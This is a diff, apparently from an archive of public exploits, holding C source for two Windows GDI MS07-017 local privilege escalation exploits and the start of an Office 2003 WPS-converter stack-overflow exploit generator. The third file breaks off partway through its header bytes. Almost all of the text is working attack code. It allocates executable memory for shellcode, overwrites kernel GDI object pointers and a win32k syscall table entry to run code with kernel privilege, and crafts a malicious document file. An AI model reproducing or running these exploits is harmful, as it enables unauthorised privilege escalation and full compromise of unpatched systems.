+	The data returned to the SystemInformation buffer is a ULONG count of the number of
+	handles followed immediately by an array of 
+	SYSTEM_MODULE_INFORMATION.
+	*/
+	
+	Count=*(PULONG)pSMI;
+	pSMI=(PSYSTEM_MODULE_INFORMATION)((PUCHAR)pSMI+4);
+	
+	for(i=0; i<Count; i++)
+	{	
+		if(StrStr((pSMI+i)->ImageName, "win32k.sys"))
+			return (ULONG)(pSMI+i)->Base;
+	}
+	
+	HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE, pSMI);
+	
+	return 0;	
+}	
+
+
+
+	
+ULONG buff[500]={0};
+	
+int main(int argc, char* argv[])
+{
+	ULONG i, PID, Status, Old;
+	LPVOID lpMapAddress=NULL;
+	HANDLE hMapFile=(HANDLE)0x10;
+	GDITableEntry *gdiTable; 
+	SECTION_BASIC_INFORMATION SBI;
+	WORD Upr;
+	ULONG Size=0x1000;
+	PVOID Addr=(PVOID)0x2;
+	
+	printf("Windows GDI MS07-017 Local Privilege Escalation Exploit\nBy Ivanlef0u\n"
+	"http://ivanlef0u.free.fr\n"
+	"Be MAD!\n");
+	
+	//allocate memory at addresse 0x2
+ 	Status=NtAllocateVirtualMemory((HANDLE)-1, &Addr, 0, &Size, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE); 
+ 	if(Status)
+ 		printf("Error with NtAllocateVirtualMemory : 0x%x\n", Status);
+ 	else
+ 		printf("Addr : 0x%x OKAY\n", Addr);	
+	
+	memcpy(Addr, Shellcode, sizeof(Shellcode)); 
+	
+
+
+ 	printf("win32.sys base : 0x%x\n", GetWin32kBase());
+	
+	ULONG Win32kSST=GetWin32kBase()+0x198300; //range between win32k imagebase and it's SSDT
+	printf("SSDT entry : 0x%x\n", Win32kSST); //win32k!NtGdiAbortDoc
+	
+	
+	
+	HBRUSH hBr;
+	hBr=CreateSolidBrush(0);
+
+	Upr=(WORD)((DWORD)hBr>>16);
+	printf("0x%x\n", Upr);
+
+	while(!lpMapAddress)
+	{
+		hMapFile=(HANDLE)((ULONG)hMapFile+1);
+		lpMapAddress=MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, 0);
+	}
+
+	if(lpMapAddress==NULL)
+	{ 
+		printf("Error with MapViewOfFile : %d\n", GetLastError()); 
+		return 0;
+	}
+
+	Status=NtQuerySection(hMapFile, SectionBasicInformation, &SBI, sizeof(SECTION_BASIC_INFORMATION), 0);
+	if (Status) //!=STATUS_SUCCESS (0)
+	{
+		printf("Error with NtQuerySection (SectionBasicInformation) : 0x%x\n", Status); 
+		return 0;
+	}
+
+	printf("Handle value : %x\nMapped address : 0x%x\nSection size : 0x%x\n\n", hMapFile, lpMapAddress, SBI.Size.QuadPart);
+	gdiTable=(GDITableEntry *)lpMapAddress;
+	PID=GetCurrentProcessId();
+	
+	for (i=0; i<SBI.Size.QuadPart; i+=sizeof(GDITableEntry))
+	{
+		if(gdiTable->ProcessID==PID && gdiTable->nUpper==Upr) //only our GdiTable and brush
+		{	
+
+			printf("gdiTable : 0x%x\n", gdiTable);
+			printf("pKernelInfo : 0x%x\n", gdiTable->pKernelInfo);
+			printf("ProcessID : %d\n", gdiTable->ProcessID);
+			printf("_nCount : %d\n", gdiTable->_nCount);
+			printf("nUpper : 0x%x\n", gdiTable->nUpper);
+			printf("nType : 0x%x\n", gdiTable->nType );
+			printf("pUserInfo : 0x%x\n\n", gdiTable->pUserInfo);
+			
+			Old=gdiTable->pKernelInfo;
+		
+			gdiTable->pKernelInfo=(ULONG)buff; //crafted buff
+			break;
+		}
+		gdiTable++;
+	}
+
+	if(!DeleteObject(hBr))
+		printf("Error with DeleteObject : %d\n", GetLastError());
+	else
+		printf("Done\n");
+
+	printf("Buff : 0x%x\n", buff);
+	memset(buff, 0x90, sizeof(buff));
+	
+ 	buff[0]=0x1; //!=0
+ 	buff[0x24/4]=Win32kSST; //syscall to modifY
+	buff[0x4C/4]=0x804D7000; //kernel base, just for avoiding bad mem ptr
+
+ 	if(!DeleteObject(hBr))
+		printf("Error with DeleteObject : %d\n", GetLastError());	
+		
+	gdiTable->pKernelInfo=Old; //restore old value
+	
+	/*	
+	lkd> uf GDI32!NtGdiAbortDoc
+	GDI32!NtGdiAbortDoc:
+	77f3073a b800100000      mov     eax,1000h
+	77f3073f ba0003fe7f      mov     edx,offset SharedUserData!SystemCallStub (7ffe0300)
+	77f30744 ff12            call    dword ptr [edx]
+	77f30746 c20400          ret     4
+	*/
+
+	__asm
+	{
+		mov eax, 0x1000
+		mov edx,0x7ffe0300
+		call dword ptr [edx]	
+	}
+	
+	return 0;
+}
+
+// milw0rm.com [2007-04-08]

platforms/windows/local/3755.c

@@ -1,199 +1,199 @@
-/*
-GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
-
-Coded by Lionel d'Hauenens 
-http://www.labo-asso.com
-
-Development:
-------------
-Dev-C++ 4.9.9.2
-Linked with /lib/libgdi32.a 
-
-References:
------------
-http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
-http://research.eeye.com/html/alerts/zeroday/20061106.html
-http://www.milw0rm.com/exploits/3688 
-http://ivanlef0u.free.fr/?p=41
-
-March 16, 2007
-*/
-
-#include <stdio.h> 
-#include <stdlib.h> 
-#include <windows.h> 
-
-typedef enum _SECTION_INFORMATION_CLASS
-{
-    SectionBasicInformation,
-    SectionImageInformation
-} SECTION_INFORMATION_CLASS;  
-                                                
-typedef struct _SECTION_BASIC_INFORMATION {
-  ULONG                   Base;
-  ULONG                   Attributes;
-  LARGE_INTEGER           Size;
-} SECTION_BASIC_INFORMATION;
-
-typedef struct _GDI_TABLE_ENTRY
-{
-   PVOID pKernelInfo;
-   WORD  ProcessID; 
-   WORD  _nCount;
-   WORD  nUpper;
-   BYTE  nType;
-   BYTE  flags;
-   PVOID pUserInfo;
-} GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY;
-
-typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG);  
-NTQUERYSECTION NtQuerySection;                                              
-
-#define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix");
-#define STATUS_SUCCESS 0
-#define PAL_TYPE 8
-    
-DWORD flag_test;
-
-hook (HANDLE pal, COLORREF couleur)
-{
-     // INT3
-     // Executed code with kernel privilege
-     asm (".intel_syntax noprefix");
-         __asm ("cli");
-         
-         // it's the fiesta !!! :)                 
-         
-         __asm ("sti");         
-     asm (".att_syntax noprefix");
-     
-     flag_test = 1;      
-     
-     return (TRUE);     
-} 
-
-int main(int argc, char *argv[])
-{    
-    SECTION_BASIC_INFORMATION SectionInfo;    
-    PGDI_TABLE_ENTRY pGdiEntry;
-    PLOGPALETTE pLogPal;
-    HANDLE hPal;
-    PVOID OriginalPalObject;
-    PVOID FalsePalObject; 
-       
-    HANDLE hThread = GetCurrentThread();  
-    DWORD OriginalThreadPriotity = GetThreadPriority (hThread);  
-    HANDLE hSection = (ULONG)0;  
-    PVOID MapFile = 0;
-    HANDLE hProcess = (HANDLE)0xFFFFFFFF;
-    WORD Pid = GetCurrentProcessId();                 
-                  
-   	NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");
-         
-    printf ("##########################################################\n");                
-    printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");
-    printf ("#        All Windows 2000/XP before MS07-017 patch       #\n");
-    printf ("##########################################################\n");   
-    printf ("# coded by Lionel d'Hauenens   http://www.labo-asso.com  #\n");
-    printf ("##########################################################\n\n");                                     
-                                                      
-    // Search handle section and mapper in virtual memory of user
-    while ((DWORD)hSection<0xFFFF) 
-    {
-        SectionInfo.Attributes = 0;  
-        MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); 
-        if (MapFile)
-        {
-            NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0);
-            if (SectionInfo.Attributes == SEC_COMMIT) break;  // For compatibility with win2k 
-            UnmapViewOfFile(MapFile); 
-            MapFile = 0;
-        }                
-        hSection++;
-    }
-
-    if (!MapFile)
-    {
-       printf ("Could not found shared section !\n");
-       exit(0);             
-    }              
-
-    // Create Palette
-    pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);    
-    pLogPal->palNumEntries = 1;
-    pLogPal->palVersion = 0x300;
-    hPal = (HANDLE)CreatePalette(pLogPal);  
-    
-    if (!hPal)
-    {
-       printf ("Could not create palette !\n");
-       exit(0);             
-    }      
-    
-    // Search the entry of pal object 
-    OriginalPalObject = (PVOID)0;        
-    pGdiEntry = (PGDI_TABLE_ENTRY)MapFile;
-    while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart)
-    {
-          if ( pGdiEntry->ProcessID == Pid  &&
-                  pGdiEntry->nType == PAL_TYPE )
-          {
-              // Save original pointer
-              OriginalPalObject =  (PVOID)pGdiEntry->pKernelInfo;                          
-              break;
-          }           
-          pGdiEntry++;          
-    }
-
-    if (!OriginalPalObject)
-    {
-       printf ("Could not find entry of Pal object !\n");
-       exit(0);                  
-    }  
-    
-    // Create the false Pal object
-    FalsePalObject                   = (PVOID) calloc(0x100/4,4);
-    ((PDWORD)FalsePalObject)[0]      = (DWORD)hPal;   // Handle    
-    ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1;     // Availabled flag
-    ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex 
-  
-    printf ("Section:\n--------\n");                                                             
-    printf ("Handle: 0x%08X    Attributes: %08X    Size: 0x%08X\n\n", hSection
-                                                                    , SectionInfo.Attributes
-                                                                    , SectionInfo.Size.QuadPart);
-    printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); 
-    printf ("Address of user map: 0x%08X\n", MapFile); 
-    printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject);  
-    printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) );     
-    printf ("Address of Hook(): 0x%08X\n\n", &hook);  
-
-    //////////////////////////////////////////////////////////////////////////////
-    //////////////////////////////////////////////////////////////////////////////  
-    printf ("->Test...");
-    flag_test = 0;            
-    SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); 
-         
-         // Active false Pal object    
-         pGdiEntry->pKernelInfo = FalsePalObject;   
-                 
-              GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :);
-             
-         // Restore original Pal object
-         pGdiEntry->pKernelInfo = OriginalPalObject; 
-    
-    SetThreadPriority (hThread,OriginalThreadPriotity);
-    //////////////////////////////////////////////////////////////////////////////
-    //////////////////////////////////////////////////////////////////////////////
-    
-    if (!flag_test) printf ("ERROR !!!\n");
-    else printf ("OK :)\n");
-
-    UnmapViewOfFile(MapFile);
-    DeleteObject ((HANDLE)hPal);
-    free((PVOID)pLogPal);
-    free((PVOID)FalsePalObject);  
-    system("PAUSE");          
-    return (0);         
-}
-
-// milw0rm.com [2007-04-17]
+/*
+GDI Local Elevation of Privilege Vulnerability Exploit (MS07-017)
+
+Coded by Lionel d'Hauenens 
+http://www.labo-asso.com
+
+Development:
+------------
+Dev-C++ 4.9.9.2
+Linked with /lib/libgdi32.a 
+
+References:
+-----------
+http://www.microsoft.com/technet/security/bulletin/MS07-017.mspx
+http://research.eeye.com/html/alerts/zeroday/20061106.html
+http://www.milw0rm.com/exploits/3688 
+http://ivanlef0u.free.fr/?p=41
+
+March 16, 2007
+*/
+
+#include <stdio.h> 
+#include <stdlib.h> 
+#include <windows.h> 
+
+typedef enum _SECTION_INFORMATION_CLASS
+{
+    SectionBasicInformation,
+    SectionImageInformation
+} SECTION_INFORMATION_CLASS;  
+                                                
+typedef struct _SECTION_BASIC_INFORMATION {
+  ULONG                   Base;
+  ULONG                   Attributes;
+  LARGE_INTEGER           Size;
+} SECTION_BASIC_INFORMATION;
+
+typedef struct _GDI_TABLE_ENTRY
+{
+   PVOID pKernelInfo;
+   WORD  ProcessID; 
+   WORD  _nCount;
+   WORD  nUpper;
+   BYTE  nType;
+   BYTE  flags;
+   PVOID pUserInfo;
+} GDI_TABLE_ENTRY, *PGDI_TABLE_ENTRY;
+
+typedef DWORD (WINAPI* NTQUERYSECTION)(HANDLE, ULONG, PVOID,ULONG,PULONG);  
+NTQUERYSECTION NtQuerySection;                                              
+
+#define INT3 asm (".intel_syntax noprefix"); __asm ("int 3"); asm (".att_syntax noprefix");
+#define STATUS_SUCCESS 0
+#define PAL_TYPE 8
+    
+DWORD flag_test;
+
+hook (HANDLE pal, COLORREF couleur)
+{
+     // INT3
+     // Executed code with kernel privilege
+     asm (".intel_syntax noprefix");
+         __asm ("cli");
+         
+         // it's the fiesta !!! :)                 
+         
+         __asm ("sti");         
+     asm (".att_syntax noprefix");
+     
+     flag_test = 1;      
+     
+     return (TRUE);     
+} 
+
+int main(int argc, char *argv[])
+{    
+    SECTION_BASIC_INFORMATION SectionInfo;    
+    PGDI_TABLE_ENTRY pGdiEntry;
+    PLOGPALETTE pLogPal;
+    HANDLE hPal;
+    PVOID OriginalPalObject;
+    PVOID FalsePalObject; 
+       
+    HANDLE hThread = GetCurrentThread();  
+    DWORD OriginalThreadPriotity = GetThreadPriority (hThread);  
+    HANDLE hSection = (ULONG)0;  
+    PVOID MapFile = 0;
+    HANDLE hProcess = (HANDLE)0xFFFFFFFF;
+    WORD Pid = GetCurrentProcessId();                 
+                  
+   	NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");
+         
+    printf ("##########################################################\n");                
+    printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");
+    printf ("#        All Windows 2000/XP before MS07-017 patch       #\n");
+    printf ("##########################################################\n");   
+    printf ("# coded by Lionel d'Hauenens   http://www.labo-asso.com  #\n");
+    printf ("##########################################################\n\n");                                     
+                                                      
+    // Search handle section and mapper in virtual memory of user
+    while ((DWORD)hSection<0xFFFF) 
+    {
+        SectionInfo.Attributes = 0;  
+        MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); 
+        if (MapFile)
+        {
+            NtQuerySection((HANDLE)hSection,0,&SectionInfo,sizeof(SectionInfo),0);
+            if (SectionInfo.Attributes == SEC_COMMIT) break;  // For compatibility with win2k 
+            UnmapViewOfFile(MapFile); 
+            MapFile = 0;
+        }                
+        hSection++;
+    }
+
+    if (!MapFile)
+    {
+       printf ("Could not found shared section !\n");
+       exit(0);             
+    }              
+
+    // Create Palette
+    pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);    
+    pLogPal->palNumEntries = 1;
+    pLogPal->palVersion = 0x300;
+    hPal = (HANDLE)CreatePalette(pLogPal);  
+    
+    if (!hPal)
+    {
+       printf ("Could not create palette !\n");
+       exit(0);             
+    }      
+    
+    // Search the entry of pal object 
+    OriginalPalObject = (PVOID)0;        
+    pGdiEntry = (PGDI_TABLE_ENTRY)MapFile;
+    while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart)
+    {
+          if ( pGdiEntry->ProcessID == Pid  &&
+                  pGdiEntry->nType == PAL_TYPE )
+          {
+              // Save original pointer
+              OriginalPalObject =  (PVOID)pGdiEntry->pKernelInfo;                          
+              break;
+          }           
+          pGdiEntry++;          
+    }
+
+    if (!OriginalPalObject)
+    {
+       printf ("Could not find entry of Pal object !\n");
+       exit(0);                  
+    }  
+    
+    // Create the false Pal object
+    FalsePalObject                   = (PVOID) calloc(0x100/4,4);
+    ((PDWORD)FalsePalObject)[0]      = (DWORD)hPal;   // Handle    
+    ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1;     // Availabled flag
+    ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex 
+  
+    printf ("Section:\n--------\n");                                                             
+    printf ("Handle: 0x%08X    Attributes: %08X    Size: 0x%08X\n\n", hSection
+                                                                    , SectionInfo.Attributes
+                                                                    , SectionInfo.Size.QuadPart);
+    printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); 
+    printf ("Address of user map: 0x%08X\n", MapFile); 
+    printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject);  
+    printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) );     
+    printf ("Address of Hook(): 0x%08X\n\n", &hook);  
+
+    //////////////////////////////////////////////////////////////////////////////
+    //////////////////////////////////////////////////////////////////////////////  
+    printf ("->Test...");
+    flag_test = 0;            
+    SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); 
+         
+         // Active false Pal object    
+         pGdiEntry->pKernelInfo = FalsePalObject;   
+                 
+              GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :);
+             
+         // Restore original Pal object
+         pGdiEntry->pKernelInfo = OriginalPalObject; 
+    
+    SetThreadPriority (hThread,OriginalThreadPriotity);
+    //////////////////////////////////////////////////////////////////////////////
+    //////////////////////////////////////////////////////////////////////////////
+    
+    if (!flag_test) printf ("ERROR !!!\n");
+    else printf ("OK :)\n");
+
+    UnmapViewOfFile(MapFile);
+    DeleteObject ((HANDLE)hPal);
+    free((PVOID)pLogPal);
+    free((PVOID)FalsePalObject);  
+    system("PAUSE");          
+    return (0);         
+}
+
+// milw0rm.com [2007-04-17]

platforms/windows/local/5107.c

@@ -1,240 +1,240 @@
-/*
-* Copyright (c) 2008 chujwamwdupe - pumpernikiel.c
-*
-* one day in teletubby land...
-*
-* an email from idefense:
-* 
-* "Unfortunately, Microsoft has refused to credit you using the name you requested."
-*
-* ...what's wrong with 'chujwamwdupe', eh?
-*
-*
-* Description:
-*    A vulnerability exists in WPS to RTF convert filter that is part
-*    of Microsoft Office 2003. It could be exploited by remote attacker
-*    to take complete control of an affected system. This issue is due to
-*    stack overflow error in function that read secions from WPS file.
-*    When we change size of for example TEXT section to number langer than
-*    0x10, stack overflow occurs - very easy to exploit.
-*
-*
-* Tested on:
-*	  Microsoft Windows XP Service Pack 2 && Microsoft Office 2003
-* 
-* Usage:
-*     wps.exe 1 evil.wps
-*
-*/
-
-#include <stdio.h>
-#include <windows.h>
-
-/* WPS Header */
-unsigned char uszWpsHeader[] =
-"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00"
-"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
-"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00"
-"\x01\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xfd\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00"
-"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x01\x00\x00\x00"
-"\xb2\x5a\xa4\x0e\x0a\x9e\xd1\x11\xa4\x07\x00\xc0\x4f\xb9\x32\xba"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x10\xb9\x5f"
-"\x53\x8f\xc7\x01\x03\x00\x00\x00\xc0\x0a\x00\x00\x00\x00\x00\x00"
-"\x43\x00\x4f\x00\x4e\x00\x54\x00\x45\x00\x4e\x00\x54\x00\x53\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x01\x02\x00\x00\x00\x03\x00\x00\x00\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x43\x00\x6f\x00\x6d\x00\x70\x00\x4f\x00\x62\x00\x6a\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x28\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x00"
-"\x53\x00\x50\x00\x45\x00\x4c\x00\x4c\x00\x49\x00\x4e\x00\x47\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x12\x00\x02\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x2a\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
-"\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00"
-"\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00"
-"\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00"
-"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00"
-"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00"
-"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00"
-"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00"
-"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00"
-"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00"
-"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\xfe\xff\xff\xff"
-"\x29\x00\x00\x00\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff"
